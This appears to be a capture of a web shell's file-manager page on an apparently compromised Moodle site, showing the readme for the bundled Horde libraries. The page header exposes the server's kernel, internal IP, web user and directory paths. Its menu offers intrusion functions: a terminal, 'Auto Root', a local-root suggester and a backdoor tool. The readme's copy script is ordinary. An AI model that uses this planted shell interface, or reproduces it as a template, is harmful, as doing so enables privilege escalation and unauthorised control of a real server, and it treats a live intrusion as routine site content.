Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
lib /
horde /
Delete
Unzip
Name
Size
Permission
Date
Action
framework
[ DIR ]
drwxr-sr-x
2017-06-22 15:27
locale
[ DIR ]
drwxr-sr-x
2017-06-22 15:43
readme_moodle.txt
1.12
KB
-rw-r--r--
2017-06-22 15:44
Save
Rename
Description of import of Horde libraries # Download the Horde git repository. You will probably want to keep this around for future updates: git clone git@github.com:horde/horde.git # Checkout the version of horde you require: git checkout horde-5.2.7 # Copy the following script and store it on /tmp, change it's execute bit, and run it, passing in your path to Horde (the directory you've cloned the repository): /tmp/copyhorde.sh ~/git/ext/horde/ # MDL-52361 patched for PHP7 compatibility, after upgrade make sure it's updated upstream and remove this line ==== #!/bin/sh source=$1/framework target=./lib/horde echo "Copy Horde modules from $source to $target" modules="Crypt_Blowfish Exception Imap_Client Mail Mime Secret Socket_Client Stream Stream_Filter Stream_Wrapper Support Text_Flowed Translation Util" rm -rf $target/locale $target/framework mkdir -p $target/locale $target/framework/Horde for module in $modules do echo "Copying $module" cp -Rf $source/$module/lib/Horde/* $target/framework/Horde locale=$source/$module/locale if [ -d $locale ] then cp -Rf $locale/* $target/locale fi done